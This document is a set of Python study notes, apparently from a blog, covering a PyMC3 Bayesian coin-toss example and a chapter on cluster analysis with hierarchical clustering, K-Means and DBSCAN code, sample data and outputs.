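Before the PyMC3 run, a grid approximation of the same posterior can serve as a sanity check; this is my own sketch, and the counts below are made-up stand-ins since the contents of QQ_data.csv are not shown:

# Grid approximation of P(mu|Data) for the Poisson model with a flat prior
import numpy as np
import scipy.stats as stats

y = np.array([20, 24, 18, 21, 25])  # hypothetical message counts
mu_grid = np.linspace(0.01, 60, 600)  # grid over the Uniform(0, 60) prior's support
log_like = np.array([stats.poisson.logpmf(y, mu=m).sum() for m in mu_grid])
post = np.exp(log_like - log_like.max())  # unnormalized posterior (flat prior)
post /= np.trapz(post, mu_grid)  # normalize by the marginal likelihood
print(mu_grid[post.argmax()])  # posterior mode, close to the sample mean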

import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import pymc3 as pm
import scipy
import scipy.stats as stats
import scipy.optimize as opt


def poisson_logprob(mu, sign=-1):
    return np.sum(sign * stats.poisson.logpmf(y_obs, mu=mu))


# read the data file
messages = pd.read_csv('QQ_data.csv')
with pm.Model() as model:
    # build a probabilistic model
    mu = pm.Uniform('mu', lower=0, upper=60)
    likelihood = pm.Poisson('likelihood', mu=mu, observed=messages['numbers'].values)
    start = pm.find_MAP()
    step = pm.Metropolis()
    trace = pm.sample(20000, step, start=start, progressbar=True)
y_obs = messages['numbers'].values
# maximum likelihood estimate of mu
freq_results = opt.minimize_scalar(poisson_logprob)
# traceplot draws the trend of the posterior samples
pm.traceplot(trace, varnames=['mu'], lines={'mu': freq_results['x']})
plt.show()
100.00% [6/6 00:00<00:00 logp = -3,399, ||grad|| = 1,991]

C:\Users\gzjzx\AppData\Local\Temp\ipykernel_1832\3361505615.py:23: DeprecationWarning: Call to deprecated Parameter start. (renamed to `initvals` in PyMC v4.0.0) -- Deprecated since v3.11.5.
  trace = pm.sample(20000, step, start=start, progressbar=True)
C:\Users\gzjzx\anaconda3\lib\site-packages\deprecat\classic.py:215: FutureWarning: In v4.0, pm.sample will return an `arviz.InferenceData` object instead of a `MultiTrace` by default. You can pass return_inferencedata=True or return_inferencedata=False to be safe and silence this warning.
  return wrapped_(*args_, **kwargs_)
Multiprocess sampling (4 chains in 4 jobs)
Metropolis: [mu]
100.00% [84000/84000 14:52<00:00 Sampling 4 chains, 0 divergences]
Sampling 4 chains for 1_000 tune and 20_000 draw iterations (4_000 + 80_000 draws total) took 911 seconds.
Example 17.11: use PyMC3 to check whether a coin-tossing experiment is biased
1. Generate the data sample
import numpy as np
import scipy.stats as stats

np.random.seed(1)
n_experiments = 100  # number of tosses
theta_real = 0.35  # the true probability of heads, represented by theta_real
data = stats.bernoulli.rvs(p=theta_real, size=n_experiments)
data
    array([0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1,       0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 1, 1, 0, 1, 1, 1, 0, 1,       0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0,       1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 1, 0, 1, 0, 0, 1, 0, 1,       1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0])
2. Specify the Bayesian model
import pymc3 as pm

with pm.Model() as our_first_model:  # a container for the model
    theta = pm.Beta('theta', alpha=1, beta=1)  # the prior (a Beta distribution, alpha=1, beta=1)
    # the likelihood is declared with the same syntax as the prior;
    # the observed argument passes in the observed data
    y = pm.Bernoulli('y', p=theta, observed=data)
    # find_MAP returns the maximum a posteriori (MAP) point, a starting point for the sampler
    start = pm.find_MAP()
    # the Metropolis-Hastings sampler; PyMC3 can also assign a sampler per parameter automatically
    step = pm.Metropolis()
    # run the sampler: the arguments are the number of draws, the sampling method, and the start point
    trace = pm.sample(1000, step=step, start=start)
WARNING (theano.configdefaults): g++ not available, if using conda: `conda install m2w64-toolchain`
WARNING (theano.configdefaults): g++ not detected! Theano will be unable to execute optimized C-implementations (for both CPU and GPU) and will default to Python implementations. Performance will be severely degraded. To remove this warning, set Theano flags cxx to an empty string.
WARNING (theano.tensor.blas): Using NumPy C-API based implementation for BLAS functions.
100.00% [6/6 00:00<00:00 logp = -69.315, ||grad|| = 14]

C:\Users\gzjzx\AppData\Local\Temp\ipykernel_16548\2057679967.py:12: DeprecationWarning: Call to deprecated Parameter start. (renamed to `initvals` in PyMC v4.0.0) -- Deprecated since v3.11.5.
  trace = pm.sample(1000, step=step, start=start)
C:\Users\gzjzx\anaconda3\lib\site-packages\deprecat\classic.py:215: FutureWarning: In v4.0, pm.sample will return an `arviz.InferenceData` object instead of a `MultiTrace` by default. You can pass return_inferencedata=True or return_inferencedata=False to be safe and silence this warning.
  return wrapped_(*args_, **kwargs_)
Multiprocess sampling (4 chains in 4 jobs)
Metropolis: [theta]

17.5.2 Model diagnostics

1. Sample path plot

PyMC3 provides the traceplot function for plotting the trend of the posterior samples

burnin = 100
chain = trace[burnin:]
pm.traceplot(chain, lines={'theta': theta_real})

2. The Gelman-Rubin diagnostic

pm.gelman_rubin(chain)

Ideally the Gelman-Rubin statistic equals 1; values below 1.1 can be taken as evidence of convergence

3. The summary function

pm.summary(chain)

4. Autocorrelation plot

pm.autocorrplot(chain)

5. Effective sample size

pm.effective_n(chain)['theta']

17.5.3 Decisions based on the posterior

pm.plot_posterior(chain)

pm.plot_posterior(chain, kde_plot=True, rope=[0.45, 0.55])

(giving up on the rest for now)

    ]]>
    + Python-人工智能数学基础 17

    ]]>
    @@ -9915,7 +9915,7 @@ /posts/Python-%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%8016/ - 正文

16 Cluster Analysis

16.1 Overview of Cluster Analysis

16.1.2 Distance and similarity

1. Euclidean distance

Simply put, the geometric distance between points in a multidimensional space.

$$d(X,Y)=\left[\Sigma^n_{i=1}(X_i-Y_i)^2\right]^{\frac{1}{2}}$$

2. Manhattan distance

The folded-line (city-block) distance travelled from one point to the other; it drops the squaring used in the Euclidean distance, which weakens the influence of outliers

$$d(X,Y)=\Sigma^n_{i=1}|X_i-Y_i|$$

3. Minkowski distance

For high-dimensional data, the Minkowski distance is a more popular metric

$$d_p(X, Y)=\left(\Sigma^n_{i=1}|X_i-Y_i|^p\right)^{\frac{1}{p}}$$

where $p$ is a chosen exponent: with $p=1$ the Minkowski distance becomes the Manhattan distance, and with $p=2$ it becomes the Euclidean distance

4. Correlation and correlation distance

The Pearson correlation coefficient can measure the correlation between samples

$$\rho_{XY}=\frac{COV(X,Y)}{\sqrt{DX}\sqrt{DY}}=\frac{\Sigma^n_{i=1}(X_i-\bar X)(Y_i-\bar Y)}{\sqrt{\Sigma^n_{i=1}(X_i-\bar X)^2}\sqrt{\Sigma^n_{i=1}(Y_i-\bar Y)^2}}$$

The correlation distance can be taken as $1-\rho_{XY}$: as the correlation strengthens, the coefficient grows and the correlation distance shrinks toward 0 (a short sketch computing all four measures follows this list)
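As mentioned, a short sketch (my example values) computing the four measures with NumPy/SciPy:

# Euclidean, Manhattan, Minkowski, and correlation distance on two toy vectors
import numpy as np
from scipy.spatial import distance

X = np.array([1.0, 2.0, 3.0, 4.0])
Y = np.array([2.0, 4.0, 5.0, 8.0])

print(distance.euclidean(X, Y))  # Euclidean: sqrt of the sum of squared differences
print(distance.cityblock(X, Y))  # Manhattan: sum of absolute differences
print(distance.minkowski(X, Y, p=3))  # Minkowski with p = 3
rho = np.corrcoef(X, Y)[0, 1]  # Pearson correlation coefficient
print(1 - rho)  # correlation distance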

16.1.3 Types of cluster analysis

Cluster analysis can be categorized from several angles

• By whether clusters nest: partition-based vs. hierarchy-based

• By the exactness of the assignment: crisp vs. fuzzy clustering

• By completeness: complete clustering vs. partial clustering

• By the nature of the clusters:

  • Prototype-based clustering: a prototype is a representative point in the sample space; also called center-based clustering
  • Graph-based clustering: grounded in graph theory, it casts clustering as an optimal graph-partition problem; objects within a cluster are connected to each other, while objects in different clusters are not
  • Density-based clustering: uses point density as the clustering criterion (the number of points inside the neighborhood of a given radius centered on a point)

16.2 Hierarchical Clustering

Hierarchical clustering merges nearby, related points into clusters, producing a layered clustering tree

In terms of cluster characteristics, some hierarchical methods behave like graph-based clustering and others like prototype-based clustering

16.2.2 The hierarchical clustering procedure

1. Treat every data point as its own cluster and compute the distance matrix between clusters
2. Merge the two closest clusters

Ways to measure the distance between clusters:

• Minimum (single-link) distance: the distance between the two closest points drawn from the two clusters

$$d(u,v)=\min_{i, j}\left[dist(u\left[i\right],v\left[j\right])\right]$$

• Maximum (complete-link) distance: the opposite of the minimum distance, taking the two farthest points of the two clusters

$$d(u,v)=\max_{i, j}\left[dist(u\left[i\right],v\left[j\right])\right]$$

• Average distance: compute the distance between every pair of points across the two clusters and take the mean; costlier to compute but more reasonable

$$d(u,v)=\Sigma_{i,j}\frac{dist(u\left[i\right],v\left[j\right])}{(|u|*|v|)}$$

16.2.3 Hierarchical clustering examples

1. Hierarchical clustering of the seed-characteristics data
# import the hierarchical clustering and dendrogram functions
from scipy.cluster.hierarchy import linkage, dendrogram
import matplotlib.pyplot as plt
# axis tick control
from matplotlib.ticker import MultipleLocator
    import pandas as pd

    %matplotlib inline
    seeds_df = pd.read_csv("seeds-less-rows.csv")
    seeds_df.head()
    area perimeter compactness length width asymmetry_coefficient groove_length grain_variety
    0 14.88 14.57 0.8811 5.554 3.333 1.018 4.956 Kama wheat
    1 14.69 14.49 0.8799 5.563 3.259 3.586 5.219 Kama wheat
    2 14.03 14.16 0.8796 5.438 3.201 1.717 5.001 Kama wheat
    3 13.99 13.83 0.9183 5.119 3.383 5.234 4.781 Kama wheat
    4 14.11 14.26 0.8722 5.520 3.168 2.688 5.219 Kama wheat

Inspect the class labels of the seeds dataset

    seeds_df.grain_variety.value_counts()
Kama wheat        14
Rosa wheat        14
Canadian wheat    14
Name: grain_variety, dtype: int64

To cluster this data hierarchically, the class labels must first be removed from the sample set

varieties = list(seeds_df.pop('grain_variety'))  # drop the class labels
samples = seeds_df.values  # keep just the values, without the column names
    samples
    array([[14.88  , 14.57  ,  0.8811,  5.554 ,  3.333 ,  1.018 ,  4.956 ],       [14.69  , 14.49  ,  0.8799,  5.563 ,  3.259 ,  3.586 ,  5.219 ],       [14.03  , 14.16  ,  0.8796,  5.438 ,  3.201 ,  1.717 ,  5.001 ],       [13.99  , 13.83  ,  0.9183,  5.119 ,  3.383 ,  5.234 ,  4.781 ],       [14.11  , 14.26  ,  0.8722,  5.52  ,  3.168 ,  2.688 ,  5.219 ],       [13.02  , 13.76  ,  0.8641,  5.395 ,  3.026 ,  3.373 ,  4.825 ],       [15.49  , 14.94  ,  0.8724,  5.757 ,  3.371 ,  3.412 ,  5.228 ],       [16.2   , 15.27  ,  0.8734,  5.826 ,  3.464 ,  2.823 ,  5.527 ],       [13.5   , 13.85  ,  0.8852,  5.351 ,  3.158 ,  2.249 ,  5.176 ],       [15.36  , 14.76  ,  0.8861,  5.701 ,  3.393 ,  1.367 ,  5.132 ],       [15.78  , 14.91  ,  0.8923,  5.674 ,  3.434 ,  5.593 ,  5.136 ],       [14.46  , 14.35  ,  0.8818,  5.388 ,  3.377 ,  2.802 ,  5.044 ],       [11.23  , 12.63  ,  0.884 ,  4.902 ,  2.879 ,  2.269 ,  4.703 ],       [14.34  , 14.37  ,  0.8726,  5.63  ,  3.19  ,  1.313 ,  5.15  ],       [16.84  , 15.67  ,  0.8623,  5.998 ,  3.484 ,  4.675 ,  5.877 ],       [17.32  , 15.91  ,  0.8599,  6.064 ,  3.403 ,  3.824 ,  5.922 ],       [18.72  , 16.19  ,  0.8977,  6.006 ,  3.857 ,  5.324 ,  5.879 ],       [18.88  , 16.26  ,  0.8969,  6.084 ,  3.764 ,  1.649 ,  6.109 ],       [18.76  , 16.2   ,  0.8984,  6.172 ,  3.796 ,  3.12  ,  6.053 ],       [19.31  , 16.59  ,  0.8815,  6.341 ,  3.81  ,  3.477 ,  6.238 ],       [17.99  , 15.86  ,  0.8992,  5.89  ,  3.694 ,  2.068 ,  5.837 ],       [18.85  , 16.17  ,  0.9056,  6.152 ,  3.806 ,  2.843 ,  6.2   ],       [19.38  , 16.72  ,  0.8716,  6.303 ,  3.791 ,  3.678 ,  5.965 ],       [18.96  , 16.2   ,  0.9077,  6.051 ,  3.897 ,  4.334 ,  5.75  ],       [18.14  , 16.12  ,  0.8772,  6.059 ,  3.563 ,  3.619 ,  6.011 ],       [18.65  , 16.41  ,  0.8698,  6.285 ,  3.594 ,  4.391 ,  6.102 ],       [18.94  , 16.32  ,  0.8942,  6.144 ,  3.825 ,  2.908 ,  5.949 ],       [17.36  , 15.76  ,  0.8785,  6.145 ,  3.574 ,  3.526 ,  5.971 ],       [13.32  , 13.94  ,  0.8613,  5.541 ,  3.073 ,  7.035 ,  5.44  ],       [11.43  , 13.13  ,  0.8335,  5.176 ,  2.719 ,  2.221 ,  5.132 ],       [12.01  , 13.52  ,  0.8249,  5.405 ,  2.776 ,  6.992 ,  5.27  ],       [11.34  , 12.87  ,  0.8596,  5.053 ,  2.849 ,  3.347 ,  5.003 ],       [12.02  , 13.33  ,  0.8503,  5.35  ,  2.81  ,  4.271 ,  5.308 ],       [12.44  , 13.59  ,  0.8462,  5.319 ,  2.897 ,  4.924 ,  5.27  ],       [11.55  , 13.1   ,  0.8455,  5.167 ,  2.845 ,  6.715 ,  4.956 ],       [11.26  , 13.01  ,  0.8355,  5.186 ,  2.71  ,  5.335 ,  5.092 ],       [12.46  , 13.41  ,  0.8706,  5.236 ,  3.017 ,  4.987 ,  5.147 ],       [11.81  , 13.45  ,  0.8198,  5.413 ,  2.716 ,  4.898 ,  5.352 ],       [11.27  , 12.86  ,  0.8563,  5.091 ,  2.804 ,  3.985 ,  5.001 ],       [12.79  , 13.53  ,  0.8786,  5.224 ,  3.054 ,  5.483 ,  4.958 ],       [12.67  , 13.32  ,  0.8977,  4.984 ,  3.135 ,  2.3   ,  4.745 ],       [11.23  , 12.88  ,  0.8511,  5.14  ,  2.795 ,  4.325 ,  5.003 ]])

Run the hierarchical clustering

# run the hierarchical clustering
mergings = linkage(samples, method='complete')

# draw the dendrogram
plt.figure(figsize=(10, 6), dpi=80)
ax = plt.subplot(111)
dendrogram(mergings,
           labels=varieties,
           leaf_rotation=90,
           leaf_font_size=10)
yminorLocator = MultipleLocator(0.2)
ax.yaxis.set_minor_locator(yminorLocator)
plt.show()

    png

# read off the clusters at a chosen level of the tree
from scipy.cluster.hierarchy import fcluster

# clusters obtained by cutting the tree at a maximum distance of 6
labels = fcluster(mergings, 6, criterion='distance')

df = pd.DataFrame({'labels': labels, 'varieties': varieties})
# count how many samples of each variety fall into each cluster
ct = pd.crosstab(df['labels'], df['varieties'])
ct

varieties  Canadian wheat  Kama wheat  Rosa wheat
labels
1                      14           3           0
2                       0           0          14
3                       0          11           0

2. How the choice of linkage distance affects the clustering
    import pandas as pd

    scores_df = pd.read_csv('eurovision-2016-televoting.csv', index_col=0)
    country_names = list(scores_df.index)
    scores_df.head()
    Armenia Australia Austria Azerbaijan Belgium Bulgaria Croatia Cyprus Czech Republic France ... Lithuania Malta Poland Russia Serbia Spain Sweden The Netherlands Ukraine United Kingdom
    From country
    Albania 2.0 12.0 0.0 0.0 0.0 8.0 0.0 0.0 0.0 0.0 ... 4.0 0.0 5.0 7.0 0.0 0.0 3.0 0.0 6.0 0.0
    Armenia NaN 0.0 4.0 0.0 0.0 0.0 0.0 6.0 0.0 7.0 ... 0.0 5.0 1.0 12.0 0.0 0.0 2.0 0.0 10.0 0.0
    Australia 0.0 NaN 3.0 0.0 12.0 10.0 0.0 0.0 0.0 7.0 ... 1.0 6.0 0.0 5.0 0.0 2.0 0.0 0.0 8.0 4.0
    Austria 0.0 3.0 NaN 0.0 0.0 5.0 0.0 0.0 0.0 1.0 ... 0.0 0.0 12.0 8.0 4.0 0.0 7.0 6.0 10.0 0.0
    Azerbaijan 0.0 2.0 0.0 NaN 0.0 8.0 0.0 0.0 0.0 4.0 ... 0.0 5.0 3.0 12.0 0.0 0.0 0.0 0.0 10.0 0.0

    5 rows × 26 columns

# fill the NaN entries
    scores_df = scores_df.fillna(12)

    from sklearn.preprocessing import normalize

# normalize the data
    samples = normalize(scores_df.values)
    samples
    array([[0.09449112, 0.56694671, 0.        , ..., 0.        , 0.28347335,        0.        ],       [0.49319696, 0.        , 0.16439899, ..., 0.        , 0.41099747,        0.        ],       [0.        , 0.49319696, 0.12329924, ..., 0.        , 0.32879797,        0.16439899],       ...,       [0.32879797, 0.20549873, 0.24659848, ..., 0.49319696, 0.28769823,        0.        ],       [0.28769823, 0.16439899, 0.        , ..., 0.        , 0.49319696,        0.        ],       [0.        , 0.24659848, 0.        , ..., 0.        , 0.20549873,        0.49319696]])
plt.figure(figsize=(10, 12), dpi=80)
plt.subplots_adjust(hspace=0.5)

# single-linkage clustering (minimum distance)
mergings = linkage(samples, method='single')
p1 = plt.subplot(211)
yminorLocator = MultipleLocator(0.05)
p1.yaxis.set_minor_locator(yminorLocator)
dendrogram(mergings,
           labels=country_names,
           leaf_rotation=90,
           leaf_font_size=10)
p1.set_title("single-min distance", fontsize=18)

# complete-linkage clustering (maximum distance)
mergings = linkage(samples, method='complete')
p2 = plt.subplot(212)
yminorLocator = MultipleLocator(0.05)
p2.yaxis.set_minor_locator(yminorLocator)
dendrogram(mergings,
           labels=country_names,
           leaf_rotation=90,
           leaf_font_size=10)
p2.set_title("complete-max distance", fontsize=18)

plt.show()

    png

16.3 K-Means Clustering

    【机器学习】K-means(非常详细)

K-means comes with a famous analogy, the priest-villager model:

Four priests go preaching in the suburbs. At first each priest picks a spot at random and announces it to all the villagers, and every villager attends the spot nearest home.
After the sermon everyone finds the trip too long, so each priest surveys the addresses of the villagers in his congregation, moves to the center of those addresses, and updates the posted location.
No move can bring a priest closer to everyone; some villagers find that after priest A moved, priest B is now nearer, so every villager again picks the nearest spot…
Week after week the priests update their positions and the villagers choose their spots, until everything settles down

• Strengths: simple, fast, works well on regular data sets

• Weaknesses: K is hard to choose, the complexity is linear in the sample size, and it struggles to find arbitrarily shaped clusters

16.3.2 The K-Means algorithm

• 1 Choose K data points as the initial cluster centroids

• 2 Compute the distance from every data point to each of the K centroids (usually the Euclidean distance) and assign the point to the nearest centroid's cluster, forming K clusters

• 3 Recompute the centroid of each of the K clusters

• 4 Repeat steps 2-3 until none of the K centroids changes any more (a minimal NumPy sketch of this loop follows the list)
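As mentioned above, a minimal NumPy sketch of steps 1-4 (my own; the examples below use sklearn's KMeans instead). It assumes no cluster ever ends up empty:

# A bare-bones K-Means loop
import numpy as np

def kmeans(points, k, n_iter=100, seed=0):
    rng = np.random.default_rng(seed)
    centroids = points[rng.choice(len(points), k, replace=False)]  # step 1: pick K points
    for _ in range(n_iter):
        # step 2: assign every point to its nearest centroid (Euclidean distance)
        dists = np.linalg.norm(points[:, None, :] - centroids[None, :, :], axis=2)
        labels = dists.argmin(axis=1)
        # step 3: recompute each cluster's centroid (assumes no cluster is empty)
        new_centroids = np.array([points[labels == j].mean(axis=0) for j in range(k)])
        if np.allclose(new_centroids, centroids):  # step 4: stop once the centroids settle
            break
        centroids = new_centroids
    return labels, centroids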

16.3.4 K-Means clustering examples

1. Clustering with KMeans from the sklearn.cluster module
(1) Read the data file and inspect its structure
    import matplotlib.pyplot as plt
    from sklearn.cluster import KMeans
    import pandas as pd

    df = pd.read_csv("ch1ex1.csv")
    points = df.values
    df.head()
    0 1
    0 0.065446 -0.768664
    1 -1.529015 -0.429531
    2 1.709934 0.698853
    3 1.167791 1.012626
    4 -1.801101 -0.318613
(2) Scatter plot of the raw samples
    plt.figure(figsize=(10, 6), dpi=80)

    xs = points[:, 0]
    ys = points[:, 1]

    plt.scatter(xs, ys)
    plt.show()

    png

The sample points clearly fall into 3 fairly regular groups; we cluster them with the K-Means algorithm

(3) Run the clustering
    model = KMeans(n_clusters=3)
    model.fit(points)
    labels = model.predict(points)
    print(labels)
    [1 2 0 0 2 2 0 1 2 2 0 1 2 0 2 1 0 0 1 0 2 1 2 1 1 2 1 1 1 2 0 0 0 2 1 2 1 1 2 1 1 0 2 2 2 1 1 0 1 0 0 0 1 1 1 2 1 1 2 0 2 1 1 0 0 2 0 2 2 1 0 2 0 1 0 2 1 1 1 0 1 2 0 2 2 2 2 1 1 0 2 0 2 1 1 1 0 2 2 0 2 1 2 0 1 0 0 0 2 2 1 2 0 2 2 2 1 2 0 0 1 1 1 1 1 2 0 1 2 2 0 0 2 1 2 1 0 2 0 1 0 0 1 0 0 1 0 2 1 1 1 0 0 2 0 2 1 1 0 2 0 0 0 2 1 1 2 0 0 1 1 0 1 1 2 1 0 0 0 1 1 0 1 0 0 1 2 0 1 1 1 1 2 0 1 2 2 2 1 2 1 1 2 0 0 1 0 1 1 2 2 1 0 2 0 1 0 2 1 2 2 2 2 0 0 0 1 1 2 1 0 2 1 1 2 1 0 0 0 0 0 2 1 1 0 0 1 2 0 2 2 1 1 2 2 2 1 0 1 2 1 0 0 0 0 0 1 1 2 1 1 2 0 0 2 1 0 0 2 2 1 1 1 2 2 1 0 2 2 0 1 1 1 2 1 1 1 2 2 2]

This is the clustering result for the 300 sample points: each is assigned to one of the 3 clusters 0, 1, 2

(4) Visualize the clustering result
# cluster centroids
centroids = model.cluster_centers_
centroids_x = centroids[:, 0]  # centroid x coordinates
centroids_y = centroids[:, 1]  # centroid y coordinates

# raw data points
xs = points[:, 0]
ys = points[:, 1]

# marker and color lists
mk0 = ['o', ',', 'v']  # marker shapes
cs0 = ['r', 'g', 'b']  # colors
mk1 = []  # marker shape for each point
cs1 = []  # color for each point
for e in labels:
    mk1.append(mk0[e])
    cs1.append(cs0[e])

plt.figure(figsize=(10, 6), dpi=120)
plt.subplot(111)
for x, y, cr, m in zip(xs, ys, cs1, mk1):
    plt.scatter(x, y, edgecolors=cr, facecolors='none', marker=m)
plt.scatter(centroids_x, centroids_y, marker='X', s=200, c='k')  # draw the centroids
plt.show()

    png

2. How the value of K affects the clustering

The file seeds.csv could not be found, so seeds-less-rows.csv is used instead

import pandas as pd
from sklearn.cluster import KMeans
import matplotlib.pyplot as plt

seeds_df = pd.read_csv('seeds-less-rows.csv')
varieties = list(seeds_df['grain_variety'])
del seeds_df['grain_variety']
samples = seeds_df.values
ks = range(1, 6)
inertias = []

for k in ks:
    # Create a KMeans instance with k clusters: model
    model = KMeans(n_clusters=k)
    # Fit model to samples
    model.fit(samples)
    # Append the inertia to the list of inertias
    inertias.append(model.inertia_)

plt.figure(figsize=(10, 6), dpi=80)
plt.subplot(111)
# Plot ks vs inertias
plt.plot(ks, inertias, '-o')
plt.xlabel('number of clusters, k')
plt.ylabel('inertia')
plt.xticks(ks)
plt.show()
C:\Users\gzjzx\anaconda3\lib\site-packages\sklearn\cluster\_kmeans.py:1036: UserWarning: KMeans is known to have a memory leak on Windows with MKL, when there are less chunks than available threads. You can avoid it by setting the environment variable OMP_NUM_THREADS=1.
  warnings.warn(

    png

As K increases, the clustering attains a smaller inertia (the total distance from the sample points to the centroids of their clusters), and the result looks more reasonable

3. Simplifying the workflow with make_pipeline from sklearn.pipeline
    import pandas as pd

    df = pd.read_csv('fish.csv')
    species = list(df['species'])
    del df['species']
    df.head()
    weight length1 length2 length3 height width
    0 242.0 23.2 25.4 30.0 38.4 13.4
    1 290.0 24.0 26.3 31.2 40.0 13.8
    2 340.0 23.9 26.5 31.1 39.8 15.1
    3 363.0 26.3 29.0 33.5 38.0 13.3
    4 430.0 26.5 29.0 34.0 36.6 15.1

The pipeline module chains together the preprocessing, clustering, and other steps to cluster the data

    from sklearn.pipeline import make_pipeline
    from sklearn.preprocessing import StandardScaler
    from sklearn.cluster import KMeans

    samples = df.values
    scaler = StandardScaler()
    kmeans = KMeans(n_clusters=4)

    pipeline = make_pipeline(scaler, kmeans)
    pipeline.fit(samples)

    labels = pipeline.predict(samples)
    df = pd.DataFrame({'labels': labels, 'species': species})
    ct = pd.crosstab(df['labels'], df['species'])
    ct
    species Bream Pike Roach Smelt
    labels
    0 33 0 1 0
    1 1 0 19 1
    2 0 17 0 0
    3 0 0 0 13

16.4 DBSCAN Clustering

    LATER ADD TO QUEUE Clustering with DBSCAN, Clearly Explained!!!(Youtube)

    png

• Eps-neighborhood

  • Set by the user: the neighborhood formed by taking a data point as the center and Eps as the radius
• MinPts threshold

  • A threshold on the number of data points inside an Eps-neighborhood. For two-dimensional data, MinPts = 4 is the usual choice
• Core point

  • A data point whose Eps-neighborhood contains ≥ MinPts data points
• Border point

  • A point whose Eps-neighborhood contains fewer than MinPts data points, but whose Eps-neighborhood contains at least one core point, or which falls inside some core point's Eps-neighborhood
• Noise point

  • A point whose Eps-neighborhood contains fewer than MinPts data points and which is not a border point, i.e. no core point lies in its Eps-neighborhood (a small sketch that labels points this way follows the list)
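As noted, a small sketch (my own, following the definitions above) that labels each point core, border, or noise:

# Classify points as core / border / noise per the DBSCAN definitions
import numpy as np

def classify_points(X, eps=0.5, min_pts=4):
    d = np.linalg.norm(X[:, None, :] - X[None, :, :], axis=2)  # pairwise distances
    neighbors = d <= eps  # Eps-neighborhood membership (each point counts itself)
    core = neighbors.sum(axis=1) >= min_pts  # core points
    # border points: not core, but at least one core point in the Eps-neighborhood
    border = ~core & (neighbors & core[None, :]).any(axis=1)
    noise = ~core & ~border  # every remaining point is noise
    return core, border, noise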

16.4.3 A DBSCAN clustering example

    #16-10.py

import numpy as np
import matplotlib.pyplot as plt
from sklearn import datasets
from sklearn.cluster import DBSCAN
from collections import Counter
%matplotlib inline

plt.figure(figsize=(12, 8), dpi=100)

# Generate the Data Source with sklearn
"""
make_moons generates a toy dataset
n_samples: number of samples to generate
shuffle: whether to shuffle the data
noise: defaults to False; whether to add Gaussian noise
random_state: random seed; fixing it to an int makes the generated data reproducible
"""
X1, _ = datasets.make_moons(n_samples=500, noise=.05)
X2, _ = datasets.make_blobs(n_samples=100, n_features=2, centers=[[1.2, 1.2]],
                            cluster_std=[[.1]], random_state=9)
X = np.concatenate((X1, X2))

# colors and markers for the scatter graph
# the first 6 mark clusters, the last marks noise points
colors = ['black', 'green', 'yellow', 'brown', 'blue', 'orange', 'red']
markers = ['o', ',', 'v', '^', '<', '>', 'x']

# Graph for the Data Source
p11 = plt.subplot(221)
p11.set_title('Data Source Graph')
plt.scatter(X[:, 0], X[:, 1], c=colors[0], marker=markers[0])

# Graph for the clustering with default params
p12 = plt.subplot(222)
p12.set_title('Clustering BY DB with Default params')
y_pred = DBSCAN().fit_predict(X)
for x, y, i in zip(X[:, 0], X[:, 1], y_pred):
    plt.scatter(x, y, c=colors[i], marker=markers[i])

# Graph for the clustering with specified params
p21 = plt.subplot(223)
p21.set_title('Clustering BY DB with Eps=0.1')
y_pred = DBSCAN(eps=0.10, min_samples=10).fit_predict(X)
for x, y, i in zip(X[:, 0], X[:, 1], y_pred):
    plt.scatter(x, y, c=colors[i], marker=markers[i])

# Graph for the clustering with specified params
p22 = plt.subplot(224)
p22.set_title('Clustering BY DB with Eps=0.12')
y_pred = DBSCAN(eps=0.12, min_samples=10).fit_predict(X)
for x, y, i in zip(X[:, 0], X[:, 1], y_pred):
    plt.scatter(x, y, c=colors[i], marker=markers[i])

plt.show()

    png

16.5 A comprehensive example: cluster analysis

Analyze a data set about beers with the K-Means and DBSCAN algorithms

1 Reading in and preprocessing the data set

    import pandas as pd

    beer = pd.read_csv('data.txt', sep=' ')
    beer
    name calories sodium alcohol cost
    0 Budweiser 144 15 4.7 0.43
    1 Schlitz 151 19 4.9 0.43
    2 Lowenbrau 157 15 0.9 0.48
    3 Kronenbourg 170 7 5.2 0.73
    4 Heineken 152 11 5.0 0.77
    5 Old_Milwaukee 145 23 4.6 0.28
    6 Augsberger 175 24 5.5 0.40
    7 Srohs_Bohemian_Style 149 27 4.7 0.42
    8 Miller_Lite 99 10 4.3 0.43
    9 Budweiser_Light 113 8 3.7 0.40
    10 Coors 140 18 4.6 0.44
    11 Coors_Light 102 15 4.1 0.46
    12 Michelob_Light 135 11 4.2 0.50
    13 Becks 150 19 4.7 0.76
    14 Kirin 149 6 5.0 0.79
    15 Pabst_Extra_Light 68 15 2.3 0.38
    16 Hamms 139 19 4.4 0.43
    17 Heilemans_Old_Style 144 24 4.9 0.43
    18 Olympia_Goled_Light 72 6 2.9 0.46
    19 Schlitz_Light 97 7 4.2 0.47

2 K-Means clustering

    from sklearn.cluster import KMeans

    X = beer[['calories', 'sodium', 'alcohol', 'cost']]

km2 = KMeans(n_clusters=2).fit(X) # clustering result with K = 2
km3 = KMeans(n_clusters=3).fit(X) # clustering result with K = 3
    beer['cluster2'] = km2.labels_
    beer['cluster3'] = km3.labels_
    beer.sort_values('cluster2')
    name calories sodium alcohol cost cluster2 cluster3
    0 Budweiser 144 15 4.7 0.43 0 0
    1 Schlitz 151 19 4.9 0.43 0 0
    2 Lowenbrau 157 15 0.9 0.48 0 0
    3 Kronenbourg 170 7 5.2 0.73 0 0
    4 Heineken 152 11 5.0 0.77 0 0
    5 Old_Milwaukee 145 23 4.6 0.28 0 0
    6 Augsberger 175 24 5.5 0.40 0 0
    7 Srohs_Bohemian_Style 149 27 4.7 0.42 0 0
    17 Heilemans_Old_Style 144 24 4.9 0.43 0 0
    16 Hamms 139 19 4.4 0.43 0 0
    10 Coors 140 18 4.6 0.44 0 0
    12 Michelob_Light 135 11 4.2 0.50 0 0
    13 Becks 150 19 4.7 0.76 0 0
    14 Kirin 149 6 5.0 0.79 0 0
    15 Pabst_Extra_Light 68 15 2.3 0.38 1 2
    9 Budweiser_Light 113 8 3.7 0.40 1 1
    18 Olympia_Goled_Light 72 6 2.9 0.46 1 2
